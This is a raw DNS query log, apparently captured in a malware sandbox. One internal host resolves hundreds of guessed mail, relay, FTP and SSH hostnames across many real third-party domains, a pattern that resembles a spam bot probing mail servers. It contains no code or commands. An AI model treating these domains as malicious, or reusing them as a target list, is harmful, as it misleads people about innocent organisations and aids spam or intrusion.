Dec 22, 2023 21:15:15.271629095 CET	1.1.1.1	192.168.2.4	0x9b8	Name error (3)	mailgate.sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.271691084 CET	1.1.1.1	192.168.2.4	0x9d8d	Name error (3)	mailgate.dresslermd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.272948027 CET	1.1.1.1	192.168.2.4	0x71fc	Name error (3)	mailgate.souriahost.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.288743019 CET	1.1.1.1	192.168.2.4	0xffc6	Name error (3)	mailgate.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.289045095 CET	1.1.1.1	192.168.2.4	0x1960	Name error (3)	mailgate.nhclex.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.291920900 CET	1.1.1.1	192.168.2.4	0x4511	Name error (3)	mailgate.pkmanagment.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.319880009 CET	1.1.1.1	192.168.2.4	0xf737	Name error (3)	relay.154892628.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.324881077 CET	1.1.1.1	192.168.2.4	0xd7b9	Name error (3)	mailgate.cominex.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.325138092 CET	1.1.1.1	192.168.2.4	0xa9c2	Name error (3)	mailgate.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.334378958 CET	1.1.1.1	192.168.2.4	0x3936	Name error (3)	mailgate.hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.334429979 CET	1.1.1.1	192.168.2.4	0x3936	Name error (3)	mailgate.hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.336813927 CET	1.1.1.1	192.168.2.4	0x5c80	Name error (3)	caribbean360-com.p10.spamhero.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.336878061 CET	1.1.1.1	192.168.2.4	0x5c80	Name error (3)	caribbean360-com.p10.spamhero.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.354908943 CET	1.1.1.1	192.168.2.4	0xf904	Name error (3)	mailgate.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.388534069 CET	1.1.1.1	192.168.2.4	0xade6	Name error (3)	mailgate.joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.530534983 CET	1.1.1.1	192.168.2.4	0x1a1b	Server failure (2)	relay.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.530546904 CET	1.1.1.1	192.168.2.4	0x1a1b	Server failure (2)	relay.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.530769110 CET	1.1.1.1	192.168.2.4	0x1a1b	Server failure (2)	relay.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.546232939 CET	1.1.1.1	192.168.2.4	0xea9d	Name error (3)	relay.srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.636138916 CET	1.1.1.1	192.168.2.4	0x920f	Name error (3)	mailgate.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.997535944 CET	1.1.1.1	192.168.2.4	0xe40c	Name error (3)	mailgate.williamcroy.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.022631884 CET	1.1.1.1	192.168.2.4	0x31fc	Server failure (2)	smtp.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.022641897 CET	1.1.1.1	192.168.2.4	0x31fc	Server failure (2)	smtp.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.200674057 CET	1.1.1.1	192.168.2.4	0x42b	Name error (3)	relay.integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.397731066 CET	1.1.1.1	192.168.2.4	0xe4bf	Name error (3)	relay.e-manage.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.400589943 CET	1.1.1.1	192.168.2.4	0xbd54	Name error (3)	mail.jiashi.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.416708946 CET	1.1.1.1	192.168.2.4	0xe1a3	Name error (3)	relay.acaiforcemaxweightloss.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.426009893 CET	1.1.1.1	192.168.2.4	0xbd54	Name error (3)	mail.jiashi.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.475159883 CET	1.1.1.1	192.168.2.4	0xbd55	Name error (3)	relay.rio-perfume.orgua	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.496535063 CET	1.1.1.1	192.168.2.4	0xd3c6	Name error (3)	mailgate.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.497895956 CET	1.1.1.1	192.168.2.4	0xaa50	Name error (3)	relay.chemcaregroup.compg	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.532759905 CET	1.1.1.1	192.168.2.4	0x4138	Name error (3)	relay.piiyuw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.535393000 CET	1.1.1.1	192.168.2.4	0xa623	Name error (3)	relay.dm.famm.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.566658974 CET	1.1.1.1	192.168.2.4	0x8082	Name error (3)	relay.arbsdecq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.568423986 CET	1.1.1.1	192.168.2.4	0x3a45	Name error (3)	relay.jesusanswwers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.591010094 CET	1.1.1.1	192.168.2.4	0x9f23	Name error (3)	relay.9a07f8a339ec2a3e.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.591188908 CET	1.1.1.1	192.168.2.4	0xfd3c	Name error (3)	relay.bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.611247063 CET	1.1.1.1	192.168.2.4	0x8740	Name error (3)	imap.easlab.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.613964081 CET	1.1.1.1	192.168.2.4	0xd549	Name error (3)	relay.select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.621258020 CET	1.1.1.1	192.168.2.4	0x5816	Name error (3)	relay.saskgmail.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.646526098 CET	1.1.1.1	192.168.2.4	0x1583	Name error (3)	relay.mercor.compl	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.674714088 CET	1.1.1.1	192.168.2.4	0xcfee	Name error (3)	relay.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.677412033 CET	1.1.1.1	192.168.2.4	0xbc18	Name error (3)	relay.aurora-resorts.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.691339016 CET	1.1.1.1	192.168.2.4	0x8082	Name error (3)	relay.arbsdecq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.691660881 CET	1.1.1.1	192.168.2.4	0x3a45	Name error (3)	relay.jesusanswwers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.712400913 CET	1.1.1.1	192.168.2.4	0xf838	Name error (3)	relay.dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.715357065 CET	1.1.1.1	192.168.2.4	0x7207	Name error (3)	relay.taylorbryant.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.717061996 CET	1.1.1.1	192.168.2.4	0xf249	Name error (3)	relay.studnets.ocps.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.725658894 CET	1.1.1.1	192.168.2.4	0x268e	Name error (3)	relay.gpa.orgau	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.728431940 CET	1.1.1.1	192.168.2.4	0x5b8	Name error (3)	relay.daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.750386000 CET	1.1.1.1	192.168.2.4	0xa156	Name error (3)	relay.mywitce.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.755558968 CET	1.1.1.1	192.168.2.4	0x7549	Name error (3)	relay.djmeca.com.ca	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.771452904 CET	1.1.1.1	192.168.2.4	0xcfee	Name error (3)	relay.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.774096966 CET	1.1.1.1	192.168.2.4	0x5425	Name error (3)	relay.souriahost.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.778806925 CET	1.1.1.1	192.168.2.4	0xbc18	Name error (3)	relay.aurora-resorts.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.797199965 CET	1.1.1.1	192.168.2.4	0x7549	Name error (3)	relay.djmeca.com.ca	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.802185059 CET	1.1.1.1	192.168.2.4	0x8ffc	Name error (3)	relay.263host.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.816030979 CET	1.1.1.1	192.168.2.4	0xa716	Name error (3)	ssh.pmcsystem.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.819219112 CET	1.1.1.1	192.168.2.4	0x4228	Name error (3)	relay.hyiquu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.827914000 CET	1.1.1.1	192.168.2.4	0x6c33	Name error (3)	relay.sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.831767082 CET	1.1.1.1	192.168.2.4	0x1b6b	Name error (3)	relay.rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.839781046 CET	1.1.1.1	192.168.2.4	0x5b8	Name error (3)	relay.daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.855971098 CET	1.1.1.1	192.168.2.4	0x775d	Name error (3)	relay.91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.873312950 CET	1.1.1.1	192.168.2.4	0xa156	Name error (3)	relay.mywitce.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.877729893 CET	1.1.1.1	192.168.2.4	0x5654	Name error (3)	relay.bilfinger.comqa	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.893795013 CET	1.1.1.1	192.168.2.4	0x86c0	Name error (3)	relay.freedhal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.894187927 CET	1.1.1.1	192.168.2.4	0xf1d2	Name error (3)	relay.vesond.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.909205914 CET	1.1.1.1	192.168.2.4	0xdbb6	Name error (3)	mail.pmcsystem.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.909451008 CET	1.1.1.1	192.168.2.4	0x3de8	Name error (3)	relay.earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.921086073 CET	1.1.1.1	192.168.2.4	0x404a	Name error (3)	relay.hermanassociatesnewyork.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.925941944 CET	1.1.1.1	192.168.2.4	0x1748	Name error (3)	relay.nsorekek.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.932534933 CET	1.1.1.1	192.168.2.4	0x2fe	Name error (3)	pop.jiashi.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.956157923 CET	1.1.1.1	192.168.2.4	0x9e55	Name error (3)	relay.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:16.957709074 CET	1.1.1.1	192.168.2.4	0xbaf3	Name error (3)	relay.dresslermd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:17.029525042 CET	1.1.1.1	192.168.2.4	0xa716	Name error (3)	ssh.pmcsystem.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:17.029793024 CET	1.1.1.1	192.168.2.4	0x4228	Name error (3)	relay.hyiquu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:17.029947042 CET	1.1.1.1	192.168.2.4	0x2fe	Name error (3)	pop.jiashi.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:17.030131102 CET	1.1.1.1	192.168.2.4	0x3de8	Name error (3)	relay.earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:17.043615103 CET	1.1.1.1	192.168.2.4	0x404a	Name error (3)	relay.hermanassociatesnewyork.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:17.043625116 CET	1.1.1.1	192.168.2.4	0x1748	Name error (3)	relay.nsorekek.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:17.043936014 CET	1.1.1.1	192.168.2.4	0x9e55	Name error (3)	relay.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:17.044086933 CET	1.1.1.1	192.168.2.4	0xbaf3	Name error (3)	relay.dresslermd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:17.044214010 CET	1.1.1.1	192.168.2.4	0xdbb6	Name error (3)	mail.pmcsystem.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:17.170160055 CET	1.1.1.1	192.168.2.4	0x2561	Name error (3)	relay.mobileuser.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:17.170250893 CET	1.1.1.1	192.168.2.4	0x2561	Name error (3)	relay.mobileuser.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.094710112 CET	1.1.1.1	192.168.2.4	0x3bcc	No error (0)	ftp.yandfcorp.com	yandfcorp.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:34.094710112 CET	1.1.1.1	192.168.2.4	0x3bcc	No error (0)	yandfcorp.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.094710112 CET	1.1.1.1	192.168.2.4	0x3bcc	No error (0)	yandfcorp.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.098182917 CET	1.1.1.1	192.168.2.4	0xe97c	No error (0)	ftp.theproducebox.com		104.26.1.173	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.098182917 CET	1.1.1.1	192.168.2.4	0xe97c	No error (0)	ftp.theproducebox.com		172.67.68.218	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.098182917 CET	1.1.1.1	192.168.2.4	0xe97c	No error (0)	ftp.theproducebox.com		104.26.0.173	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.099370003 CET	1.1.1.1	192.168.2.4	0x40e9	Name error (3)	ftp.aikya.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.110665083 CET	1.1.1.1	192.168.2.4	0x1150	No error (0)	mx2-us1.ppe-hosted.com		148.163.129.51	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.110665083 CET	1.1.1.1	192.168.2.4	0x1150	No error (0)	mx2-us1.ppe-hosted.com		67.231.154.163	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.114115953 CET	1.1.1.1	192.168.2.4	0xd21b	No error (0)	mail.customizedperformance.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.114115953 CET	1.1.1.1	192.168.2.4	0xd21b	No error (0)	mail.customizedperformance.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.114473104 CET	1.1.1.1	192.168.2.4	0xdad6	No error (0)	alt3.aspmx.l.google.com		64.233.184.26	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.125475883 CET	1.1.1.1	192.168.2.4	0xe3fa	No error (0)	ftp.customizedperformance.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.125475883 CET	1.1.1.1	192.168.2.4	0xe3fa	No error (0)	ftp.customizedperformance.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.125494003 CET	1.1.1.1	192.168.2.4	0xfc2a	Name error (3)	ftp.adelaideclub.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.128731966 CET	1.1.1.1	192.168.2.4	0x87c0	No error (0)	viruswall.tvs-e.in		115.111.182.213	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.130419970 CET	1.1.1.1	192.168.2.4	0xffa	Name error (3)	ftp.loghole.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.133354902 CET	1.1.1.1	192.168.2.4	0xb009	No error (0)	ftp.smartiebritches.com	smartiebritches.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:34.133354902 CET	1.1.1.1	192.168.2.4	0xb009	No error (0)	smartiebritches.com		15.197.142.173	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.133354902 CET	1.1.1.1	192.168.2.4	0xb009	No error (0)	smartiebritches.com		3.33.152.147	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.150562048 CET	1.1.1.1	192.168.2.4	0xdfa	Name error (3)	ftp.harrell-associates.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.153646946 CET	1.1.1.1	192.168.2.4	0xf1a	No error (0)	ftp.ireland-ventures.com	ireland-ventures.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:34.153646946 CET	1.1.1.1	192.168.2.4	0xf1a	No error (0)	ireland-ventures.com		66.254.66.55	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.153657913 CET	1.1.1.1	192.168.2.4	0xbf82	Name error (3)	ftp.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.221050024 CET	1.1.1.1	192.168.2.4	0x76d5	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.41.3	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.221050024 CET	1.1.1.1	192.168.2.4	0x76d5	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.9.2	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.221050024 CET	1.1.1.1	192.168.2.4	0x76d5	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.40.6	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.221050024 CET	1.1.1.1	192.168.2.4	0x76d5	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.8.32	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.221050024 CET	1.1.1.1	192.168.2.4	0x76d5	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.9.0	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.221050024 CET	1.1.1.1	192.168.2.4	0x76d5	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.9.14	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.241255045 CET	1.1.1.1	192.168.2.4	0x63c1	Name error (3)	mail.smartiebritches.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.241359949 CET	1.1.1.1	192.168.2.4	0xf1a	No error (0)	ftp.ireland-ventures.com	ireland-ventures.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:34.241359949 CET	1.1.1.1	192.168.2.4	0xf1a	No error (0)	ireland-ventures.com		66.254.66.55	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.241455078 CET	1.1.1.1	192.168.2.4	0xffa	Name error (3)	ftp.loghole.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.241534948 CET	1.1.1.1	192.168.2.4	0xdfa	Name error (3)	ftp.harrell-associates.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.241617918 CET	1.1.1.1	192.168.2.4	0xfc2a	Name error (3)	ftp.adelaideclub.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.241805077 CET	1.1.1.1	192.168.2.4	0xb009	No error (0)	ftp.smartiebritches.com	smartiebritches.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:34.241805077 CET	1.1.1.1	192.168.2.4	0xb009	No error (0)	smartiebritches.com		15.197.142.173	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.241805077 CET	1.1.1.1	192.168.2.4	0xb009	No error (0)	smartiebritches.com		3.33.152.147	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.241925001 CET	1.1.1.1	192.168.2.4	0xe3fa	No error (0)	ftp.customizedperformance.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.241925001 CET	1.1.1.1	192.168.2.4	0xe3fa	No error (0)	ftp.customizedperformance.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.242199898 CET	1.1.1.1	192.168.2.4	0xbf82	Name error (3)	ftp.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.244843960 CET	1.1.1.1	192.168.2.4	0xd354	No error (0)	aspmx3.googlemail.com		209.85.202.27	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.250252962 CET	1.1.1.1	192.168.2.4	0xe86d	Name error (3)	mail.aikya.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.253901958 CET	1.1.1.1	192.168.2.4	0xf5c	Name error (3)	relay.mywitce.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.254805088 CET	1.1.1.1	192.168.2.4	0xdb20	Name error (3)	relay.djmeca.com.ca	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.254818916 CET	1.1.1.1	192.168.2.4	0x5584	Name error (3)	relay.hyiquu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.254846096 CET	1.1.1.1	192.168.2.4	0x2cc5	Name error (3)	relay.souriahost.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.256376028 CET	1.1.1.1	192.168.2.4	0xa650	Name error (3)	relay.gpa.orgau	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.261230946 CET	1.1.1.1	192.168.2.4	0x176b	No error (0)	bldowney.com.2.0001.arsmtp.com		8.19.118.200	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.264153957 CET	1.1.1.1	192.168.2.4	0xe10f	Name error (3)	ftp.valentinegrowers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.279539108 CET	1.1.1.1	192.168.2.4	0x7df3	Name error (3)	relay.91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.280397892 CET	1.1.1.1	192.168.2.4	0x5564	Name error (3)	relay.263host.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.280801058 CET	1.1.1.1	192.168.2.4	0x7f06	Name error (3)	relay.rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.281769991 CET	1.1.1.1	192.168.2.4	0xf4ff	Name error (3)	relay.daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.283703089 CET	1.1.1.1	192.168.2.4	0xb157	Name error (3)	relay.sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.286437035 CET	1.1.1.1	192.168.2.4	0xf48e	No error (0)	ftp.kegerators.net	kegerators.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:34.286437035 CET	1.1.1.1	192.168.2.4	0xf48e	No error (0)	kegerators.net		15.197.142.173	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.286437035 CET	1.1.1.1	192.168.2.4	0xf48e	No error (0)	kegerators.net		3.33.152.147	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.286848068 CET	1.1.1.1	192.168.2.4	0x5a9c	No error (0)	ftp.jaydien.com		74.102.74.162	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.306005001 CET	1.1.1.1	192.168.2.4	0x14b4	No error (0)	pop.eddc.com		208.91.197.26	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.306569099 CET	1.1.1.1	192.168.2.4	0xd9d1	Name error (3)	ftp.thenile.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.309238911 CET	1.1.1.1	192.168.2.4	0x4b19	No error (0)	ftp.mcammond.net	static.turbifysites.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:15:34.309238911 CET	1.1.1.1	192.168.2.4	0x4b19	No error (0)	static.turbifysites.com		3.230.199.117	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.309238911 CET	1.1.1.1	192.168.2.4	0x4b19	No error (0)	static.turbifysites.com		35.168.67.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.314204931 CET	1.1.1.1	192.168.2.4	0xa42d	Name error (3)	mail.loghole.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.319570065 CET	1.1.1.1	192.168.2.4	0xc3ec	Name error (3)	pop.jiashi.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.326174021 CET	1.1.1.1	192.168.2.4	0x452c	No error (0)	mail.intermountainmls.com		66.232.64.219	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.328088045 CET	1.1.1.1	192.168.2.4	0x3eec	Name error (3)	relay.mobileuser.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.352495909 CET	1.1.1.1	192.168.2.4	0x9252	No error (0)	yandfcorp-com.mail.protection.outlook.com		104.47.59.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.352495909 CET	1.1.1.1	192.168.2.4	0x9252	No error (0)	yandfcorp-com.mail.protection.outlook.com		104.47.55.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.355016947 CET	1.1.1.1	192.168.2.4	0xff73	No error (0)	racesystems-com-au.mail.protection.outlook.com		104.47.71.202	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.355016947 CET	1.1.1.1	192.168.2.4	0xff73	No error (0)	racesystems-com-au.mail.protection.outlook.com		104.47.71.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.355653048 CET	1.1.1.1	192.168.2.4	0x8b0b	No error (0)	covicol-com.mail.protection.outlook.com		104.47.17.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.355653048 CET	1.1.1.1	192.168.2.4	0x8b0b	No error (0)	covicol-com.mail.protection.outlook.com		104.47.17.74	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.359694958 CET	1.1.1.1	192.168.2.4	0x1f12	No error (0)	ismaworld-com.mail.protection.outlook.com		104.47.74.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.360018969 CET	1.1.1.1	192.168.2.4	0xba48	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.41.6	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.360018969 CET	1.1.1.1	192.168.2.4	0xba48	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.9.17	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.360018969 CET	1.1.1.1	192.168.2.4	0xba48	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.40.1	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.360018969 CET	1.1.1.1	192.168.2.4	0xba48	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.42.13	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.360018969 CET	1.1.1.1	192.168.2.4	0xba48	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.8.34	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.360018969 CET	1.1.1.1	192.168.2.4	0xba48	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.11.2	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.363114119 CET	1.1.1.1	192.168.2.4	0x7b24	Name error (3)	ssh.pmcsystem.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.363126993 CET	1.1.1.1	192.168.2.4	0xa92	No error (0)	spool.mail.gandi.net		217.70.178.1	A (IP address)	IN (0x0001)	false
